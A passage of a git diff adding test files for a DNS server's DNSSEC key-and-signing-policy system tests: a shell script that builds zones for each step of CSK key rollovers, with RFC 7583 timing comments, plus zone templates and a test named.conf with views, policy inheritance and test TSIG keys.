+$SETTIME -s -g $H -k $O $TactN -r $U now-2h -d $H now-2h -z $U $TactN1 "$CSK1" > settime.out.$zone.1 2>&1
+$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O now-2h -z $R $TactN1 "$CSK2" > settime.out.$zone.2 2>&1
+# Set key rollover relationship.
+key_successor $CSK1 $CSK2
+# Sign zone.
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# After the retire interval has passed the predecessor DNSKEY can be +# removed from the zone. +setup step6.csk-roll.autosign +# According to RFC 7583: +# Trem(N) = Tret(N) + IretZ +# Tret(N) = Tact(N) + Lcsk +# +# Lcsk: 186d +# Iret: 4h +# IretZ: 26d3h +# +# Tact(N) = Tnow - IretZ - Lcsk = now - 627h - 186d +# = now - 627h - 4464h = now - 5091h +# Tret(N) = Tnow - IretZ = now - 627h +# Trem(N) = Tnow +# Tpub(N+1) = Tnow - IretZ - Ipub = now - 627h - 3h = now - 630h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow - IretZ + Lcsk = now - 627h + 186d = now + 3837h +# Trem(N+1) = Tnow + Lcsk = now + 186d +TactN="now-5091h" +TretN="now-627h" +TremN="now" +TpubN1="now-630h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3837h" +TremN1="now+186d" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $H $TremN -d $H $TremN -z $U $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $R $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 7: +# Some time later the predecessor DNSKEY enters the HIDDEN state. +setup step7.csk-roll.autosign +# Subtract DNSKEY TTL plus zone propagation delay from all the times (2h). +# Tact(N) = now - 5091h - 2h = now - 5093h +# Tret(N) = now - 627h - 2h = now - 629h +# Trem(N) = now - 2h +# Tpub(N+1) = now - 630h - 2h = now - 632h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 3837h - 2h = now + 3835h +# Trem(N+1) = now + 186d - 2h = now + 4462h +TactN="now-5093h" +TretN="now-629h" +TremN="now-2h" +TpubN1="now-632h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3835h" +TremN1="now+4462h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $H $TremN -d $H $TremN -z $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TactN1 -z $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 8: +# The predecessor DNSKEY can be purged. +setup step8.csk-roll.autosign +# Subtract purge-keys interval from all the times (1h). +# Tact(N) = now - 5093h - 1h = now - 5094h +# Tret(N) = now - 629h - 1h = now - 630h +# Trem(N) = now - 2h - 1h = now - 3h +# Tpub(N+1) = now - 632h - 1h = now - 633h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 3835h - 1h = now + 3834h +# Trem(N+1) = now + 4462h - 1h = now + 4461h +TactN="now-5094h" +TretN="now-630h" +TremN="now-3h" +TpubN1="now-633h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3834h" +TremN1="now+4461h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $H $TremN -r $H $TremN -d $H $TremN -z $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TactN1 -z $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at csk-roll2.autosign represent the various steps of a CSK rollover +# (which is essentially a ZSK Pre-Publication / KSK Double-KSK rollover). +# This scenario differs from the above one because the zone signatures (ZRRSIG) +# are replaced with the new key sooner than the DS is swapped. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.csk-roll2.autosign +TactN="now" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# It is time to introduce the new CSK. 
+setup step2.csk-roll2.autosign +# According to RFC 7583: +# KSK: Tpub(N+1) <= Tact(N) + Lksk - IpubC +# ZSK: Tpub(N+1) <= Tact(N) + Lzsk - Ipub +# IpubC = DprpC + TTLkey (+publish-safety) +# Ipub = IpubC +# Lcsk = Lksk = Lzsk +# +# Lcsk: 6mo (186d, 4464h) +# Dreg: N/A +# DprpC: 1h +# TTLkey: 1h +# publish-safety: 1h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk + Ipub = now - 186d + 3h +# = now - 4464h + 3h = now - 4461h +TactN="now-4461h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# It is time to submit the DS and to roll signatures. 
+setup step3.csk-roll2.autosign +# According to RFC 7583: +# +# Tsbm(N+1) >= Trdy(N+1) +# KSK: Tact(N+1) = Tsbm(N+1) +# ZSK: Tact(N+1) = Tpub(N+1) + Ipub = Tsbm(N+1) +# KSK: Iret = DprpP + TTLds (+retire-safety) +# ZSK: IretZ = Dsgn + Dprp + TTLsig (+retire-safety) +# +# Lcsk: 186d +# Dprp: 1h +# DprpP: 1w +# Dreg: N/A +# Dsgn: 12h +# TTLds: 1h +# TTLsig: 1d +# retire-safety: 1h +# Iret: 170h +# IretZ: 38h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk = now - 186d +# Tret(N) = now +# Trem(N) = Tnow + Iret = now + 170h +# Tpub(N+1) = Tnow - Ipub = now - 3h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow + Lcsk = now + 186d +# Trem(N+1) = Tnow + Lcsk + Iret = now + 186d + 170h = +# = now + 4464h + 170h = now + 4634h +TactN="now-186d" +TretN="now" +TremN="now+170h" +TpubN1="now-3h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+186d" +TremN1="now+4634h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 -z $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# Some time later all the ZRRSIG records should be from the new CSK, and the +# DS should be swapped. 
The ZRRSIG records are all replaced after IretZ (38h). +# The DS is swapped after Dreg + Iret (1w3h). In other words, the zone +# signatures are replaced before the DS is swapped. +setup step4.csk-roll2.autosign +# According to RFC 7583: +# Trem(N) = Tret(N) + IretZ +# +# Lcsk: 186d +# Dreg: N/A +# Iret: 170h +# IretZ: 38h +# +# Tact(N) = Tnow - IretZ = Lcsk = now - 38h - 186d +# = now - 38h - 4464h = now - 4502h +# Tret(N) = Tnow - IretZ = now - 38h +# Trem(N) = Tnow - IretZ + Iret = now - 38h + 170h = now + 132h +# Tpub(N+1) = Tnow - IretZ - IpubC = now - 38h - 3h = now - 41h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow - IretZ + Lcsk = now - 38h + 186d +# = now + 4426h +# Trem(N+1) = Tnow - IretZ + Lcsk + Iret +# = now + 4426h + 3h = now + 4429h +TactN="now-4502h" +TretN="now-38h" +TremN="now+132h" +TpubN1="now-41h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4426h" +TremN1="now+4429h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $U $TretN -d $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -z $R $TactN1 -d $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# Some time later the DS can be swapped and the old DNSKEY can be removed from +# the zone. +setup step5.csk-roll2.autosign +# Subtract Iret (170h) - IretZ (38h) = 132h. +# +# Tact(N) = now - 4502h - 132h = now - 4634h +# Tret(N) = now - 38h - 132h = now - 170h +# Trem(N) = now + 132h - 132h = now +# Tpub(N+1) = now - 41h - 132h = now - 173h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4426h - 132h = now + 4294h +# Trem(N+1) = now + 4492h - 132h = now + 4360h +TactN="now-4634h" +TretN="now-170h" +TremN="now" +TpubN1="now-173h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4294h" +TremN1="now+4360h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $H now-133h -d $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -z $O now-133h -d $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# Some time later the predecessor DNSKEY enters the HIDDEN state. +setup step6.csk-roll2.autosign +# Subtract DNSKEY TTL plus zone propagation delay (2h). +# +# Tact(N) = now - 4634h - 2h = now - 4636h +# Tret(N) = now - 170h - 2h = now - 172h +# Trem(N) = now - 2h +# Tpub(N+1) = now - 173h - 2h = now - 175h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4294h - 2h = now + 4292h +# Trem(N+1) = now + 4360h - 2h = now + 4358h +TactN="now-4636h" +TretN="now-172h" +TremN="now-2h" +TpubN1="now-175h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4292h" +TremN1="now+4358h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TremN -z $H now-135h "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $O now-135h "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 7: +# The predecessor DNSKEY can be purged, but purge-keys is disabled. +setup step7.csk-roll2.autosign +# Subtract 90 days (default, 2160h) from all the times. +# Tact(N) = now - 4636h - 2160h = now - 6796h +# Tret(N) = now - 172h - 2160h = now - 2332h +# Trem(N) = now - 2h - 2160h = now - 2162h +# Tpub(N+1) = now - 175h - 2160h = now - 2335h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4294h - 2160h = now + 2134h +# Trem(N+1) = now + 4360h - 2160h = now + 2200h +TactN="now-6796h" +TretN="now-2332h" +TremN="now-2162h" +TpubN1="now-2335h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+2134h" +TremN1="now+2200h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TremN -z $H now-135h "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $O now-135h "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. 
+cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Test #2375, the "three is a crowd" bug, where a new key is introduced but the +# previous rollover has not finished yet. In other words, we have a key KEY2 +# that is the successor of key KEY1, and we introduce a new key KEY3 that is +# the successor of key KEY2: +# +# KEY1 < KEY2 < KEY3. +# +# The expected behavior is that all three keys remain in the zone, and not +# the bug behavior where KEY2 is removed and immediately replaced with KEY3. +# +# Set up a zone that has a KSK (KEY1) and have the successor key (KEY2) +# published as well. +setup three-is-a-crowd.kasp +# These times are the same as step3.ksk-doubleksk.autosign. +TactN="now-60d" +TretN="now" +TremN="now+50h" +TpubN1="now-27h" +TsbmN1="now" +TactN1="${TretN}" +TretN1="now+60d" +TremN1="now+1490h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. 
+cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile"
+cp $infile $zonefile
+$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
diff --git a/bin/tests/system/kasp/ns3/template.db.in b/bin/tests/system/kasp/ns3/template.db.in
new file mode 100644
index 0000000..010b05b
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/template.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns3
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/kasp/ns3/template2.db.in b/bin/tests/system/kasp/ns3/template2.db.in
new file mode 100644
index 0000000..7b94ace
--- /dev/null
+++ b/bin/tests/system/kasp/ns3/template2.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns3
+ns3 A 10.53.0.3
+
+a A 10.0.0.11
+b A 10.0.0.22
+c A 10.0.0.33
+d A 10.0.0.44
diff --git a/bin/tests/system/kasp/ns4/example1.db.in b/bin/tests/system/kasp/ns4/example1.db.in
new file mode 100644
index 0000000..c9e537f
--- /dev/null
+++ b/bin/tests/system/kasp/ns4/example1.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns4
+ns4 A 10.53.0.4
+
+view TXT "view1"
diff --git a/bin/tests/system/kasp/ns4/example2.db.in b/bin/tests/system/kasp/ns4/example2.db.in
new file mode 100644
index 0000000..c1f16a2
--- /dev/null
+++ b/bin/tests/system/kasp/ns4/example2.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns4
+ns4 A 10.53.0.4
+
+view TXT "view2"
diff --git a/bin/tests/system/kasp/ns4/named.conf.in b/bin/tests/system/kasp/ns4/named.conf.in
new file mode 100644
index 0000000..fff45ab
--- /dev/null
+++ b/bin/tests/system/kasp/ns4/named.conf.in
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key "sha1" {
+ algorithm "hmac-sha1";
+ secret "FrSt77yPTFx6hTs4i2tKLB9LmE0=";
+};
+
+key "sha224" {
+ algorithm "hmac-sha224";
+ secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==";
+};
+
+key "sha256" {
+ algorithm "hmac-sha256";
+ secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=";
+};
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+key "keyforview3" {
+ algorithm @DEFAULT_HMAC@;
+ secret "C1Azf+gGPMmxrUg/WQINP6eV9Y0=";
+};
+
+dnssec-policy "test" {
+ keys {
+ csk key-directory lifetime 0 algorithm 14;
+ };
+};
+
+options {
+ query-source address 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-policy "test";
+};
+
+view "inherit" {
+ match-clients { key "sha1"; };
+
+ /* Inherit dnssec-policy 'test' */
+ zone "inherit.inherit.signed" {
+ type primary;
+ file "inherit.inherit.signed.db";
+ inline-signing yes;
+ };
+
+ /* Override dnssec-policy */
+ zone "override.inherit.signed" {
+ type primary;
+ file "override.inherit.signed.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.inherit.signed" {
+ type primary;
+ file "none.inherit.signed.db";
+ dnssec-policy "none";
+
};
+};
+
+view "override" {
+ match-clients { key "sha224"; };
+ dnssec-policy "default";
+
+ /* Inherit dnssec-policy 'test' */
+ zone "inherit.override.signed" {
+ type primary;
+ file "inherit.override.signed.db";
+ inline-signing yes;
+ };
+
+ /* Override dnssec-policy */
+ zone "override.override.signed" {
+ type primary;
+ file "override.override.signed.db";
+ inline-signing yes;
+ dnssec-policy "test";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.override.signed" {
+ type primary;
+ file "none.override.signed.db";
+ dnssec-policy "none";
+ };
+};
+
+view "none" {
+ match-clients { key "sha256"; };
+ dnssec-policy "none";
+
+ /* Inherit dnssec-policy 'none' */
+ zone "inherit.none.signed" {
+ type primary;
+ file "inherit.none.signed.db";
+ };
+
+ /* Override dnssec-policy */
+ zone "override.none.signed" {
+ type primary;
+ file "override.none.signed.db";
+ inline-signing yes;
+ dnssec-policy "test";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.none.signed" {
+ type primary;
+ file "none.none.signed.db";
+ dnssec-policy "none";
+ };
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ allow-update { any; };
+
+ zone "example.net" {
+ type primary;
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ zone "example.net" {
+ type primary;
+ file "example2.db";
+ inline-signing yes;
+ };
+};
+
+view "example3" {
+ match-clients { key "keyforview3"; };
+ zone "example.net" {
+ in-view example2;
+ };
+};
diff --git a/bin/tests/system/kasp/ns4/setup.sh b/bin/tests/system/kasp/ns4/setup.sh
new file mode 100644
index 0000000..45cb5b3
--- /dev/null
